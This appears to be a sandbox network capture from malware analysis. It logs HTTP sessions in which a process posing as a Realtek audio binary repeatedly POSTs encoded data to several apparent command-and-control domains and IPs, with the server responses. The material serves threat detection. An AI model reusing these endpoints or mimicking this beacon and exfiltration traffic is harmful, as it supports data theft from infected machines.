                                                                            GET /98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.optimismbank.xyz
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Timestamp: Dec 3, 2024 18:55:19.256767035 CET | Bytes transferred: 389 | Direction: IN | Data:
                                                                            HTTP/1.1 200 OK
                                                                            Server: openresty
                                                                            Date: Tue, 03 Dec 2024 17:55:19 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 249
                                                                            Connection: close
                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs"}</script></head></html>


                                                                            Session ID: 5 | Source IP: 192.168.11.20 | Source Port: 49754 | Destination IP: 209.74.77.109 | Destination Port: 80 | PID: 7608 | Process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp: Dec 3, 2024 18:55:24.661668062 CET | Bytes transferred: 761 | Direction: OUT | Data:
                                                                            POST /r3zg/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.greenthub.life
                                                                            Origin: http://www.greenthub.life
                                                                            Referer: http://www.greenthub.life/r3zg/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=QsQDN7O2mvjYnnjJE/yBfta4w06H4GrxekjnJJrTeyjF6HKnsyM2qzvpav2mMN9x8x6fFnBTRYXaYQieHMOi/5o8vM5xsjCvANVxvedSw3F8C2LbkmoZ6c3c+q5kDnhU7dDdZcGgYnlDCEXDrmK7DhbsZkwd69CyRYQx3N8AwOyIas+Y8EsKZHXOuOUET5xYAQ==
                                                                            Timestamp: Dec 3, 2024 18:55:24.856693983 CET | Bytes transferred: 533 | Direction: IN | Data:
                                                                            HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:55:24 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session ID: 6 | Source IP: 192.168.11.20 | Source Port: 49755 | Destination IP: 209.74.77.109 | Destination Port: 80 | PID: 7608 | Process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp: Dec 3, 2024 18:55:27.374723911 CET | Bytes transferred: 781 | Direction: OUT | Data:
                                                                            POST /r3zg/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.greenthub.life
                                                                            Origin: http://www.greenthub.life
                                                                            Referer: http://www.greenthub.life/r3zg/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=QsQDN7O2mvjYmGTJCYmBdNa3pU6H3mr9elfnJN7DeAHF6jantzM2mTvpRP2jRd9+8x38FihTRYDaYQyeH7ij+poiks5kyTCvANVxveJow018DH7blDFrks3fo65kOHhQ7dDjZejNYhpDCGfDrXK4ZxbqdkxP2IvWIbA/7fxT8c6dSazCh2YuaUL8q+tsR7wDdU/kqXJwG4uhWZgnSbFSZJc=
                                                                            Timestamp: Dec 3, 2024 18:55:27.571683884 CET | Bytes transferred: 533 | Direction: IN | Data:
                                                                            HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:55:27 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session ID: 7 | Source IP: 192.168.11.20 | Source Port: 49756 | Destination IP: 209.74.77.109 | Destination Port: 80 | PID: 7608 | Process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp: Dec 3, 2024 18:55:30.092909098 CET | Bytes transferred: 7930 | Direction: OUT | Data:
                                                                            POST /r3zg/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.greenthub.life
                                                                            Origin: http://www.greenthub.life
                                                                            Referer: http://www.greenthub.life/r3zg/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O= [TRUNCATED]
                                                                            Timestamp: Dec 3, 2024 18:55:30.290868998 CET | Bytes transferred: 533 | Direction: IN | Data:
                                                                            HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:55:30 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session ID: 8 | Source IP: 192.168.11.20 | Source Port: 49757 | Destination IP: 209.74.77.109 | Destination Port: 80 | PID: 7608 | Process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp: Dec 3, 2024 18:55:32.809967995 CET | Bytes transferred: 488 | Direction: OUT | Data:
                                                                            GET /r3zg/?ChhG6=J-xs&2O=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc= HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.greenthub.life
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Timestamp: Dec 3, 2024 18:55:33.005325079 CET | Bytes transferred: 548 | Direction: IN | Data:
                                                                            HTTP/1.1 404 Not Found
                                                                            Date: Tue, 03 Dec 2024 17:55:32 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session ID: 9 | Source IP: 192.168.11.20 | Source Port: 49758 | Destination IP: 23.225.159.42 | Destination Port: 80 | PID: 7608 | Process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp: Dec 3, 2024 18:55:39.284168005 CET | Bytes transferred: 6 | Direction: OUT | Data:
                                                                            Data Raw: 50 4f 53 54
                                                                            Data Ascii: POST
                                                                            Timestamp: Dec 3, 2024 18:55:39.471441031 CET | Bytes transferred: 532 | Direction: IN | Data:
                                                                            HTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 357
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>
Dec 3, 2024 18:55:39.471782923 CET | 751 | OUT |
                                                                            Data Ascii: /n2c9/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brCache-Control: no-ca


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.11.20 | 49759 | 23.225.159.42 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:55:41.998610020 CET | 6 | OUT |
Data Ascii: POST
Dec 3, 2024 18:55:42.185931921 CET | 532 | IN | HTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 357
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>
Dec 3, 2024 18:55:42.186125040 CET | 771 | OUT |
                                                                            Data Ascii: /n2c9/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brCache-Control: no-ca


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.11.20 | 49760 | 23.225.159.42 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:55:44.715244055 CET | 6 | OUT |
Data Ascii: POST
Dec 3, 2024 18:55:44.900614977 CET | 532 | IN | HTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 357
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>
Dec 3, 2024 18:55:44.900976896 CET | 7920 | OUT |
                                                                            Data Ascii: /n2c9/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brCache-Control: no-ca


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.11.20 | 49761 | 23.225.159.42 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:55:47.433063984 CET | 6 | OUT | GET
Dec 3, 2024 18:55:47.620858908 CET | 532 | IN | HTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 357
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://cdn-bj.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>
Dec 3, 2024 18:55:47.621149063 CET | 482 | OUT |
                                                                            Data Ascii: /n2c9/?2O=3x/7f4nzUvf4SsmqzFnTfg9SxMMmEiloZs8QEOaGeCkTK2Ae1JBrg2z7Qirl6WfPBEFIuXRetS7qNq3tJgV/JudJBWlXSOQ4g5lNoHOvpN8KebvqySaeOvo=&ChhG6=J-xs HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/a


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.11.20 | 49762 | 46.30.211.38 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:55:53.443073034 CET | 761 | OUT | POST /uf7y/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.bankseedz.info
                                                                            Origin: http://www.bankseedz.info
                                                                            Referer: http://www.bankseedz.info/uf7y/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=a+/R7g38sexoorYVP+I8T1Jx5voDxm3unlHhNkL6ktWvU7vdtJLpAEE2mEHXPwgfAoKbj+Niaa6ruEMf1O8z6YpLneSXOEJCGQE+5mgD9QfBX5z2F23ivO1NyZghdm3IqYARmo4R4D0mK2W67eVFJOG4dKvyZ65or3VTYjnLah9Fnmrs9mF4pnI2BfkGNCoXqA==
Dec 3, 2024 18:55:53.682337046 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Tue, 03 Dec 2024 17:55:53 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 564
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.11.20 | 49763 | 46.30.211.38 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:55:56.215830088 CET | 781 | OUT | POST /uf7y/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.bankseedz.info
                                                                            Origin: http://www.bankseedz.info
                                                                            Referer: http://www.bankseedz.info/uf7y/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=a+/R7g38sexo5+IVcJ08SVJy2PoDm231nl7hNhzUnbmvUbfdsILpOkE21EHWXQgAAoPmj+xiaauruBof19UwrYpJv+SVKEJCGQE+5mlL9QHBXID2XEfjze1OzZghZm2gqYA/mpk34FwmKzS67rpKeeGEZKuWUaEKkH1bSgOYdjhYmwm2gUxcq0UEFvduPApM3GRjeIM0+N2MeZL693UX/kk=
Dec 3, 2024 18:55:56.454977036 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Tue, 03 Dec 2024 17:55:56 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 564
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.11.20 | 49764 | 46.30.211.38 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:55:58.994667053 CET | 2578 | OUT | POST /uf7y/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.bankseedz.info
                                                                            Origin: http://www.bankseedz.info
                                                                            Referer: http://www.bankseedz.info/uf7y/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=a+/R7g38sexo5+IVcJ08SVJy2PoDm231nl7hNhzUnYGvUondqrzpNkE22EHTXQgJAo2tj+8AaZWrun0fk8UwiYpJjeSIOEJXGQUi5lNL9QHBXKb2HG3jxe1NyZgldm2bqYYJmpxM51QmKTi655BKd+G8eKuOUaI8kHphSh7FdgBYnRDH3RQH3yQuP99VMWkaw3QdVOQY0YGle6LnmDoXrzU5EsWYGldd8/iZiz6yz0lN2/PfvyiVlyoOYzB9pgFcFuwDBXn3NFLih7FYJ/hN4ytR4F09GdAYb/RhVrqaVDsAR2uUHUGV2GihILMi0S1prWIkxFRRftjBaI5NlMtsTxL80LGa9XfZodUUKAw9wecK0G6Bhl1vMaxm5glg3RDBvZplqHDNBZsVUkHBYd2+F0oaunxUkn44eiT8FRFCZmGAA3637UlJDr0HUJqr45BKAtUkb95M3tqJ5OSeFzn2lbmYJw+Jkk1CMX+KRhqP68QexGyIKvF4tzf28lO3Q4bknuSfPv5Psv/sSKG8tJB1WGwX2VtuSCVsHwl1yCbbl4pDK40QJ0rVRio/RHS8NMTHCVdMrwd8aBf+21eea8ZCIbKkXnmVJIaY925vYAhZZmAFqDEzag+xuIWhtJDVGKm1HO3H5PLC1ZjBvNvsN3GFdfPjSQu9CaDmgt5VRBZe5+r5KizFYBbbvnwqaICf0fJncqUBQfm9O78vy8gKStIPt/ub8FhQNua2BY4p+SLTCvb9jHZVg7wLInFYPBDK1qjN7Y7Q1EsRwZuRj882cpymHvZyGGoOnZMOMTkYCwHeiZs4xYdRjFcme4Bqtvx5cnncFKWdOVt25NXUqtxD/LoCGQQe1hvVxGo9sI1AwvH2I7LdfzMOHR24HYRYc+RLJXSevKocgKX6Kr4U6JF8MKD9dzQQnI+EnvRaxAwPVtdP7+HwVCCa6kUa04XFtOXlHKbqI8OYdRKCcJXQ972JFrYFQ4bLB3RYnvpyigq3Db8pxP63dS3a6 [TRUNCATED]
Dec 3, 2024 18:55:58.994745016 CET | 5352 | OUT |
                                                                            Data Ascii: aFOcz/aszvCGELfgv5RHlMt+9flKrXPliKdL1JOb9E+NZL1oWYieuoyBzyEEUKLiBhpql9axfoerVb3kDUbvjQoEvpQYQbWNj1eaWR75i4mzsF3XEEUBbDfJ7SNXJ6vKbhjepBEMIyADgbJFwws1XfGO0KALshh7YoHukS2bFEFNVlTi9vOX67BUhOQXEXrXlbLSEjnX6oU1cKq13YEUsEKM69xh1jKDF4Brh6geVfKakDKxABW
Dec 3, 2024 18:55:59.251279116 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Tue, 03 Dec 2024 17:55:59 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 564
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.11.20 | 49765 | 46.30.211.38 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 18:56:01.760416985 CET | 488 | OUT | GET /uf7y/?2O=X8Xx4Xb3zOwIp/YkPeQkR0guwoAt7ELtmVzPPBr+rNKRcobOh5vjSVYUxnTRN3k+HcX7svN7WZWipHk078Y7lpE6s8+6fnJkBTwA9zJT+z2YULyhD3K67+Y=&ChhG6=J-xs HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Connection: close
                                                                            Host: www.bankseedz.info
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:56:02.000062943 CET | 738 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                            Date: Tue, 03 Dec 2024 17:56:01 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 564
                                                                            Connection: close
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            17 | 192.168.11.20 | 49766 | 103.224.182.242 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:56:07.642168045 CET | 749 | OUT | POST /3iym/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 199
                                                                            Connection: close
                                                                            Host: www.madhf.tech
                                                                            Origin: http://www.madhf.tech
                                                                            Referer: http://www.madhf.tech/3iym/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=shRImUNLCD6ykkHJ0prPaKzvfSfNFBP0rJf4zlyXi7owMhO1k8S/BIyckhiLf1fR4cf6dEhhyqazp95l4im4+b3i+ZtnGSafQzYmgi2aGNM/dM5zfrNbByu1ejkix4iK3dRiyHNQjx+QSQhACtmf8kGutTZ0Up3RsVJS0NYXbGHcoMpz77gxuWx8fFSmf7xXyg==
                                                                            Dec 3, 2024 18:56:07.843976021 CET | 871 | IN | HTTP/1.1 200 OK
                                                                            date: Tue, 03 Dec 2024 17:56:07 GMT
                                                                            server: Apache
                                                                            set-cookie: __tad=1733248567.7025274; expires=Fri, 01-Dec-2034 17:56:07 GMT; Max-Age=315360000
                                                                            vary: Accept-Encoding
                                                                            content-encoding: gzip
                                                                            content-length: 576
                                                                            content-type: text/html; charset=UTF-8
                                                                            connection: close


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            18 | 192.168.11.20 | 49767 | 103.224.182.242 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:56:10.363874912 CET | 769 | OUT | POST /3iym/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 219
                                                                            Connection: close
                                                                            Host: www.madhf.tech
                                                                            Origin: http://www.madhf.tech
                                                                            Referer: http://www.madhf.tech/3iym/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Data Ascii: 2O=shRImUNLCD6ykE3J1KzPbqzsRyfNTxPwrOX4zk2HitwwMDW1n+q/UIycsBjDb1ed4cTcdA9hyq+zp9Jl41y5kr3k25tlLyafQzYmgmfSGN0/c8JzeKNYJSu2djkin4jB3dRcyFp6jz2QSSpAC/OY2kGowDYLQ4eNhHwk8twQVV6ng6kpmJUVtFtOb1rOd5wMvhma/4MKvE7O906BtqU1I/g=
                                                                            Dec 3, 2024 18:56:10.568619013 CET | 871 | IN | HTTP/1.1 200 OK
                                                                            date: Tue, 03 Dec 2024 17:56:10 GMT
                                                                            server: Apache
                                                                            set-cookie: __tad=1733248570.8813292; expires=Fri, 01-Dec-2034 17:56:10 GMT; Max-Age=315360000
                                                                            vary: Accept-Encoding
                                                                            content-encoding: gzip
                                                                            content-length: 576
                                                                            content-type: text/html; charset=UTF-8
                                                                            connection: close


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            19 | 192.168.11.20 | 49768 | 103.224.182.242 | 80 | 7608 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 3, 2024 18:56:13.082297087 CET | 2578 | OUT | POST /3iym/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Cache-Control: no-cache
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 7367
                                                                            Connection: close
                                                                            Host: www.madhf.tech
                                                                            Origin: http://www.madhf.tech
                                                                            Referer: http://www.madhf.tech/3iym/
                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                            Dec 3, 2024 18:56:13.082361937 CET | 5340 | OUT
